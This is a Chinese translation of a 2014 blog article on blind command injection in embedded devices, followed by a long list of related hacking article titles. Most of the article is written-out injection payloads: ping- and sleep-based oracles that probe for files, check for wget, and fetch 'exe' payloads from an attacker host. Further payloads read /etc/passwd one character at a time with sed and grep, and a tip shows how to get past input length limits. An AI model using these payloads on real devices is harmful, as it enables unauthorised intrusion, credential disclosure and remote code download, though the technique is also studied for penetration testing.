嵌入式设备中的盲注 (翻译)

杀戮 (乌云安全实验室的杂役) | 2014-12-17 16:14

作者展示的情况是当你能输入命令但是看不到回显的情况下如何确认这是个漏洞,并利用。

下面就是我自己的话翻译的。

0x00 简介

很多时候你可能能输入一些命令像ping 或者reboot,但是由于你看不到回显,所以无法确定是否存在漏洞,或者漏洞如何利用。

所以我会考虑酱紫的命令

# 如果/bin/ls存在会执行Ping
;if test -e "/bin/ls";then ping -c1 192.168.1.2;fi;
# or better
;if test -e "/bin/ls";then ping -c1 192.168.1.2;else ping -c2 192.168.1.2;fi;

当回显成功我会采取一些手段来确认目标的环境

# 检测敏感文件和目录
;if test -d "/tmp";then ping -c2 192.168.1.2;fi;
;if test -r "/var/passwd";then ping -c2 192.168.1.2;fi;
;if test -r "/etc/passwd";then ping -c2 192.168.1.2;fi;

# 登陆日志是否存在?
;if test -e "/usr/bin/logger";then ping -c1 192.168.1.2;fi;

# 检测wget命令是否存在
;if test -e "/bin/wget";then ping -c1 192.168.1.2;fi;
;if test -e "/sbin/wget";then ping -c1 192.168.1.2;fi;
;if test -e "/usr/bin/wget";then ping -c1 192.168.1.2;fi;
;if test -e "/usr/sbin/wget";then ping -c1 192.168.1.2;fi;

不同的嵌入式系统都可能进行大量而且风格不同的二次开发,必须使用大量命令测试目标的可用环境。(我觉得还是写脚本跑吧)

通过不同样式的命令执行方式你甚至可以检查出对应脚本

wget -g -r exe -l exe 192.168.1.2
wget http://192.168.1.2/exe
wget 192.168.1.2/exe

0x01 SQL盲注带来的Idea

我对嵌入式系统的盲注做了简单介绍,最近这种方法给了我很多灵感,其实这个很像SQL盲注

# http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
IF EXISTS (SELECT * FROM users WHERE username = 'root')
BENCHMARK(1000000000,MD5(1))

酱紫的

事实上我们可以在linux中达到同样的效果,linux中有很多很强大的工具,像sed 啊,grep啊

$ if test `sed -n '/^root/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
// 检测root,下面是一些更好的方式。
$ if test `sed -n '/^r/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
$ if test `sed -n '/^ro/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
$ if test `sed -n '/^roo/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1
$ if test `sed -n '/^root/{s/^\(.\{1\}\).*/\1/g;p}' /etc/passwd`;then echo 1;else echo 2;fi
1

通过一些字符串操作命令我们可以轻易的检测任何一个文件任何一行的内容,还可以使用sleep 等一些时间命令来达到时间盲注的效果。

0x02 技巧和窍门

1. 这些技巧是否有用跟所处的环境还有智商有着很大的关联。

2. 大多数时候wget就够用了

3. 可能有的时候会有字符限制,不能输入超过40个,这时候可以用重定向方式把命令放到一个文件再去执行

4. 成为一个正则表达式好手,善于玩弄各种奇葩的符号。

0x03 总结

我所描述的并不是什么新技术,只是现有技术的一种根据环境而变化的变种。

0x04 例子

# 检测root
if test `sed -n '/^roo:/{s/^\(.\{1\}\).*/\1/g;p}' /var/passwd`;then sleep 15;fi

# 检测ftp账户
if test `sed -n '/^ftp:/{s/^\(.\{1\}\).*/\1/g;p}' /var/passwd`;then sleep 15;fi

# 如果第二行是0开头就执行命令sleep
if test `sed -n 2p /etc/passwd|sed -n '/^0/{s/^\(.\{1\}\).*/\1/g;p}'`;then sleep 15;fi

# 如果root再第一行就ping
if test `sed -n 1p /etc/passwd|sed -n '/root/{s/^\(.\{1\}\).*/\1/g;p}'`;then ping -c1 192.168.1.2;fi

# 如果root那行的长度等于10 就执行ping
s=`cat /etc/passwd|grep root`;if test ${#s} -eq 10;then ping -c1 192.168.1.2;fi
# ping back if `pwd` is "/tmp"
if test `pwd` == "/tmp";then ping -c1 192.168.1.2;fi

# 检测linux版本
if test `sed -n '/^Linux version 2.6.30/{s/^\(.\{1\}\).*/\1/g;p}' /proc/version`;then echo 1;fi

# 一些grep实例
if test `grep root /etc/passwd|grep -o .|sed -n 1p` = "r";then echo 1; else echo 2;fi
if test `grep root /etc/passwd|grep -o ..|sed -n 1p` = "ro";then echo 1; else echo 2;fi
if test `grep root /etc/passwd|grep -o ...|sed -n 1p` = "roo";then echo 1; else echo 2;fi

[原文地址]

相关内容:

Hack无线门铃 - 简单分析和重放攻击,信号重放,无线物理硬件黑客

嵌入式设备中的盲注 (翻译)

【视频】黑客远程入侵汽车解锁车门,汽车电子钥匙信号重放,重放钥匙扣信号

iSniff GPS:WIFI被动嗅探工具,嗅探附近无线设备广播泄漏信息定位

全自动无线入侵热点,黑客全自动WIFI钓鱼,大规模批量无线热点钓鱼

汽车设备安全问题,ETC通道缴费信号伪造,如何免费跑高速

WiFi流量劫持:网站JS脚本缓存投毒!长期控制!浏览任意页面即可中毒!

某些WIFI分享软件存在缺陷可能导致电脑内文件被他人读取

如何入侵控制交通红绿灯?美研究人员发现劫持交通灯其实非常简单

走进科学:银行ATM机真的安全吗?

某款网络摄像机直接获取帐号密码,视频监控设备配置信息泄露漏洞

讨论如何入侵演唱会无线话筒,hack掉演唱会无线麦的可能性

讨论电影中出现的各种骇客、黑客入侵手法,《幽灵》、《神探夏洛克》

如果躲开支付宝风险监控,何才能做到不违反支付宝风控条件呢?

户外物理渗透:终端机,客户端的web测试思路

使用WiFi真的有那么危险吗?安全科普:教你增强自己的无线网络安全

WiFi里的猫腻:变色龙病毒,无线破解、蹭网,蜜罐路由器,黑吃黑

黑客讲故事:攻下隔壁女生路由器后,我都做了些什么,无线路由器被蹭网后,入侵女神

女黑客Oona,分析直升机现场拍摄警车追捕画面中的信号声,绘出飞机飞行轨迹

WIFI蜜灌之路由上的会话劫持

指纹门控的安全,户外物理设备入侵,如何入侵绕过指纹识别安全锁、门控系统

揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息

新型“变色龙”:可以通过空气传播的Wifi网络病毒

玩转无线 -- GNURADIO 简单运用

进入了路由器怎么让她进入我的钓鱼网页?

已更新Iwork10测评!求推荐一款便携式户外物理移动渗透终端设备!!!

求推荐一款便携式户外物理移动渗透终端设备!!!

视频监控的一种通杀问题?大部分视频监控系统客户端无需密码?

一基友再遇奇葩无线网络环境,顺便求二级/三级/四级ISP的盈利方式?

Hikvision IP Cameras Multiple Vulnerabilities,海康威视IP摄像机的多个漏洞

Hikvision IP Cameras Multiple Vulnerabilities, 海康威视IP摄像机的多个漏洞

穷举海康威视监控密码的小程序,入侵海康威视IP摄像机

已获得网络出口引擎管理员权限,试问监控全网HTTP密码传输可能性?

浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉

【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工

教你怎样关闭Windows的摄像头指示灯(含视频)

走近科学:破解苹果MacBook摄像头进行秘密监控

利用声学密码分析攻击破译4096位RSA加密算法

FreeBuf2014贺岁视频: 极客教你如何劫持无人机

国外成功使用电视棒接收玉兔登陆信号

物理攻击?那些年我们忽略掉的一些社会工程学手段

ATM 机里装着什么?ATM 机的结构是什么?ATM 的构造原理?

利用ZoomEye探索互联网hikvision摄像头

关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料?

社工思路讨论:如何根据蛛丝马迹来找到具体的人或者物?

伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙!

讨论:通过无线路由渗透入侵内网电脑,如何从无线路由器到个人PC机?

为什么所有的无线频率都是2.4GHz?

谈谈时事:电话“诈”弹导致多地机场飞机被迫返航,论如何打电话不被追踪

如何发现系统中的异常,交易系统异常行为监控机制讨论

俺在国外当会棍 -- WIFI 篇

逆向追踪:查找360wifi(知道ssid)的使用者

Windows下的无线热点蜜罐

未来利用大脑频率杀死人类猜想(讨论)

小米云服务同步“wlan设置”的安全性,小米已收集了32万wifi明文密码

电影/电视剧/纪实片 信用卡信息泄漏猜想

移动自助终端未授权访问-通杀丽江

昨天从忘记带钥匙里学到的,欢乐讨论:各种开锁、物理黑客

“伪基站”任意冒用手机号短信诈骗

物理设备安全大牛 Barnaby Jack 挂了...

技术讨论: 楼宇广告终端 怎么破? 入侵户外广告大屏幕!

(视频)USRP 来Sniffing 无线键盘,27Mhz keyboard sniffing

(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing

(视频)USRP 来 Sniffing 无线键盘,27Mhz keyboard sniffing

全面披露华硕十款无线路由器 - AiCloud启用单位的多个漏洞

我们是如何通过一张照片定位到疯狗位置的

钟馗之眼(ZoomEye):网络空间搜索引擎

黑市交易 – 女性肉鸡价格比男性贵100倍

麻省理工发明可以穿墙透视的WiFi雷达

如何用ZoomEye(钟馗之眼)批量获得站点权限

使用电视棒接收飞机信号简单的实现方法

使用电视棒接收飞机信号 简单的实现方法

超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她

讨论如何通过航空飞机的互联网入侵、劫持飞机上的乘客,入侵劫持卫星

R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B)

rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹ADS-B/TCAS/SSR

rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR

电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪

rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪

揭秘美国网军:纯铜包裹建筑防信号外泄

黑客改造脑波耳机,让您可以通过思想控制建筑物

[技术实现]美国国安局如何实现海量用户数据的监控?

视频: Dtac:将宠物变成了WiFi热点,泰国运营商将宠物变成WiFi热点

户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机)

视频: 可以用手势控制的Wi-Fi:WiSee

WIFI信号可用于识别身体姿势

公共无线安全——FakeAP之WiFi钓鱼

GNU Radio USRP OpenBTS 小区短信 区域短信

一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截

监听空中的无线电,监听polices对讲机

周末湖边 Sniffing ADS-B,Hack 私人小型机场

视频: ATM 的那点事! ATM 漏洞, Hack for fun! 利用磁卡导致ATM关机

嘿嘿,发现个ATM 漏洞, 利用磁卡导致ATM关机

如何用Android智能手机劫持一架飞机(PPT下载)

最彪悍的“黑客”攻破千家银行从未失手

物理黑客户外硬件入侵之:某咖啡厅的广告展示终端……

陌陌猥琐流定位妹纸精准位置 有图有真相 + 安卓工具

[讨论]如何入侵一个户外的电子显示屏

Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入

关于迅雷突破物理带宽速度的讨论

android软件外加监控,隐私安全?!爆个一键root内幕!

关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论

远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击

也谈新旧SIM卡耗电之争——从手机处理STK异常说起

dSploit—Android网络渗透套件测试小记(含视频)

实时抓取移动设备上的通信包(ADVsock2pipe+Wireshark+nc+tcpdump)

FBI备忘录显示黑客成功入侵了商业HVAC工控系统

android 手机系统、平台渗透测试神器 dSploit

看新闻学知识之手机千里追回

西安丢iPhone定位在北京民警辗转2400公里追回

三星智能电视被曝安全漏洞 黑客能控制摄像头

电话诈骗手段升级 听按键音破译银行密码

一种可能的针对云端的监控

公共WiFi免费蛋糕能否长久 成本谁来埋单

如果大量短信攻击会不会造成拒绝服务,导致手机接不进电话?

手机连接不明WiFi网购 网友账户内1200元被盗

武汉公安开发尖端人像识别系统 可瞬间辨认嫌疑人 全国摄像头寻人

终端机常见绕过沙盘方法、突破终端机屏幕锁定限制方法大全

美国极超音速飞机90分钟飞越半球,时速可达4000千米,飞行在太空边缘

单反刷成安卓/ios,手机 psp kindle,连文曲星 计算器 空调遥控器也不放过

试验无线网络监听 网络账户密码也可被获取

美国电视节目用波音飞机做坠机实验,让飞机多一些撞击试验

视频:FPSRussia的俄式军火秀 遥控武装四桨直升机[中英双语字幕]

免费 WiFi 是“披着羊皮的狼”,女子蹭网引来20多名警察

网曝银行卡密码“漏洞”

浦发ATM机两地曝系统故障 用户调侃自助盗号机

王鹏你妹“占领”北京地铁五号线屏幕,关于“王鹏你妹”的真相

北京地铁5号线所有电视屏显示“王鹏你妹”官方回应

谷歌获智能手表专利:原理似谷歌眼镜(图)

Flightradar24 网站“直播”天上“堵飞机” 看全球实时航班

尺子和锤子的力平衡 - 创意的平衡尺

街机、捕鱼机、上分器、解码器、打码器、写码器、无线、遥控

美国试点超级无线网络 覆盖范围达数公里

电话机真的可以用嘴巴模拟拨号音来拨号?

用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话

用音响打电话,揭秘柯南电话拨号,如果电话键失灵了,直接用音响打电话

如何从按键音中听出360总裁周鸿祎的手机号码 + 详细剖析

iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器

Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗

iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号

视频:Sight 未来视网膜成像技术 科幻微电影

德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机

支付宝错发中奖短信 送236台iPad2

视频:纸飞机驱动模组,电子纸飞机

视频:如何动手改造iPhone添加无线充电功能

黑客6人组有人分析有人谈判 监控ATM机视频锁定嫌疑人

瑞典研发新技术可让WiFi每秒传输2.5TB数据

拉斯维加斯国际黑客大会(DefCon 2012黑客会议)本周开战

男子侵入上海移动平台群发广告短信牟利获刑

802.11b 无线网络固件级攻击、802.11b Firmware-Level Attacks

谷歌放出首个由Google眼镜拍摄的视频 720P格式

视频:1秒钟可复制银行卡?这不是骗局[财经夜行线]

美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透

手机全息投影、初音、Miku、立体投影,制作方法已放出,图文+视频

从技术角度深入剖析:改号软件,电话号码任意显示,伪造来电显示

华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕

视频:国外黑客无线入侵、遥控电子路桥系统

视频:国外黑客无线入侵保时捷911,并且远程操控、遥控

视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播

视频:国外黑客入侵高速公路交通电子屏

大屏系统被黑 泰国国会现场直播不雅照

视频:漂浮在空中的水珠、静止的水滴,适合做成展品的视错觉,超炫!!

美军投资新型隐形眼镜 可将信息投射到眼球上

利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备

电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍?

Google开发扩展现实眼镜 基于Android系统运行

黑客攻击漏洞 让 ATM 机自动吐钱

伪造免费 WiFi 盗你账号密码

瑞星:ATM出现漏洞 银行:哪有这回事?

瑞星提醒:农行、建行ATM出现漏洞 可被黑客利用攻击内网

末世入侵行动 (Fire Sale!) 末日入侵行动

视频:德国牛人!手工打造电力驱动的载人多浆式直升飞机!

视频:看牛人是怎么玩遥控飞机的 - 变矩螺旋桨倒飞

视频:鬼佬的室内四轴定位系统,震惊,飞机模型能玩到如此地步!

浙大实验室现最萌饮水机 揭开“饮水机娘”的神秘面纱

视频:360度全景球形可投掷照相机 360度全景球形相机

黑客入侵南非银行系统 盗走670万美金 黑客入侵、盗取

ATM Skimmers - ATM Hacker - 自动提款机黑客

GSM蜂窝基站定位基本原理浅析

用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位

不要偷黑客的东西 - Why you don't steal from a hacker

纪念集成电路之父、英特尔创始人罗伯特·诺伊斯84周年诞辰

【视频】发射到121000英尺(36880.8米)摄影机拍摄地球

物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点

金山截获国内首个QQ群蠕虫病毒

1970年左右发现最早黑客技术——哨子

美国号称世界最快飞机试飞时失去联系

北京东城警方强装WIFI监控软件遭质疑

【视频】NRF24L01无线射频模块实现无线视频通讯实例

【视频】NRF24L01无线射频模块 实现无线视频通讯实例

美“赤脚大盗”科尔顿面临6年监禁 曾偷5架飞机

美国“末日飞机”曝光 面临大灾难可保护首脑 可抗核武器袭击、核辐射

CMCC【中国移动】无线热点破解思路

破解无线wifi密码后不能上网的问题解析

苹果iPhone和谷歌Android手机被曝"定位"用户

能直接在眼球上投影图像的隐形眼镜,智子?

无银行卡,密码10万元1分钟转走,超级黑客?

扫描指定IP网段存在的网络摄像头、监控设备

【计算机常识】双机无线wifi互联教程

【视频】永远不会掉下来的纸飞机 - 折纸滑翔机

【技巧】用无线路由实现无线桥接

【工具】无线破解/渗透工具 Beini-1.2.1

【工具】AIO_Wifi_Hack_2010

渗透某餐厅无线点餐服务器

视频:黑客实战入侵,黑客入侵大楼灯光控制系统,黑客们的游戏,户外物理入侵